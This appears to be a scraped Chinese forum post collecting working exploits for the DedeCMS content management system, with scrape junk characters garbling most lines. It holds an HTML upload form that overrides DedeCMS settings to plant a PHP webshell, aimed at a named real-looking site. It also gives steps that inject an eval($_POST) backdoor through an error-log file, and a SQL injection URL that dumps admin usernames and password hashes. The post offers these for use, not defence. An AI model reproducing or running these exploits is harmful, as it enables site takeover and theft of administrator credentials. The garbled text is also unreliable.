" i* c: w0 B; Y) X# E6 n; g<body style="FONT-SIZE: 9pt">
# o8 L# x6 p, R& Z. K; w---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />. K- ]1 Y5 b/ `9 f
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
) M V: D, }/ q0 @4 ]<input type='hidden' name='activepath' value='/data/cache/' />
. [# m' y& A$ T<input type='hidden' name='cfg_basedir' value='../../' />
; X! g9 v4 u/ }<input type='hidden' name='cfg_imgtype' value='php' />, r5 |: z( k: i+ _: M3 Y
<input type='hidden' name='cfg_not_allowall' value='txt' />
! r9 D0 G9 M. t* L+ y; @' p<input type='hidden' name='cfg_softtype' value='php' />
2 E# c; C, V8 E$ p, ]& n' w% Z<input type='hidden' name='cfg_mediatype' value='php' />- _/ W) W) e" A2 t2 m+ |! B
<input type='hidden' name='f' value='form1.enclosure' />
+ D, u* z/ t$ f0 \5 O<input type='hidden' name='job' value='upload' />
1 ~0 h% P% O3 i5 G! r<input type='hidden' name='newname' value='fly.php' />6 |& N7 v' J7 i' L5 L, x
Select U Shell <input type='file' name='uploadfile' size='25' />
- a2 t3 ^% [& L+ f/ D8 Y<input type='submit' name='sb1' value='确定' />9 N& t' X& {6 G; f* A9 q! N' y
</form>
6 u* x# N7 s+ t) q7 c' c s<br />It's just a exp for the bug of Dedecms V55...<br />9 m( T, @6 u2 J" Q; p7 ?% _0 w# l
Need register_globals = on...<br />
# D0 e; v' f" N. P8 V' |# U% j* u4 OFun the game,get a webshell at /data/cache/fly.php...<br />
) Y! L' I# u+ S</body>/ A. j; E ~& h q, Y
</html>
9 U; `, ~6 c" v; c6 K, l5 X) t- C& P, J7 U) m8 k! b0 G
% p) N$ _! ?# G4 ]
3 X9 {' {) p* E9 h& ^' J/ _
5 i5 S) ~( ]# u3 ? f; t0 D |* C \* \4 M# j0 z1 ^0 z' C% D
/ Z7 I: f6 h6 R: v& x4 E
) c. g W, e6 f% W5 ]6 R2 N! U5 v) B
8 z: }1 Y% |! `* W
- [9 S5 c0 v: z2 P1 T/ G9 s6 ]0 W1 e: E/ l) _
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
4 j- E! o0 f5 N. k利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。& x1 s4 v/ b5 C2 C" {6 N
1. 访问网址:' K8 O- L# C! k3 D) c4 @& Y& v
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>9 e0 ]4 G9 x7 J. Z% O4 h
可看见错误信息
% g" O" E7 V; ~) [' d3 I
* C# I, q: ^$ Z9 O9 e) M1 i6 ~
0 ` R2 f/ T J9 k1 L; ]/ m2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。& }" U% i& L( A1 P, S- u/ i+ j
int(3) Error: Illegal double '1024e1024' value found during parsing$ e G# S* f& q; [+ ]: X
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>6 ? B+ t+ }+ H3 x1 c$ @3 C1 Y1 t
1 j1 o6 L# e" H; D8 h
* c( p/ Q4 X: u: v! O* N% c
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是7 V4 S6 D8 p% Z. v
/ J# z% x n+ Q6 d. o
1 Y) I, h$ g! v( x4 G<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
+ u! e- j* I8 O& O/ i C/ s1 {5 s) B$ V1 F
; z2 ~3 Y2 r9 A7 \$ {& Y* k/ r按确定后的看到第2步骤的信息表示文件木马上传成功.
4 k( v g, E: `6 ~' w4 [; r+ ^: W9 H, n( c$ t5 a
' `" l! d" s6 Q& b
1 k& X$ G) c2 e( Q1 w
% @4 s% b- Q& [3 `3 @
4 z. ~* G& r8 ?& { `0 [1 k. m; F8 E/ n, d! X
6 ]1 ?+ S7 I: d" r# V. B
( v5 w# c+ ?% F1 }! @* y6 a0 p- b& T% E& t
: W. v0 ^3 p/ w! R5 P' q% |
& n" a7 g8 e3 E9 \' {7 d" e) `3 k. z7 b7 ?" |. _6 s, K
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
5 X' {* F4 w( V }' whttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对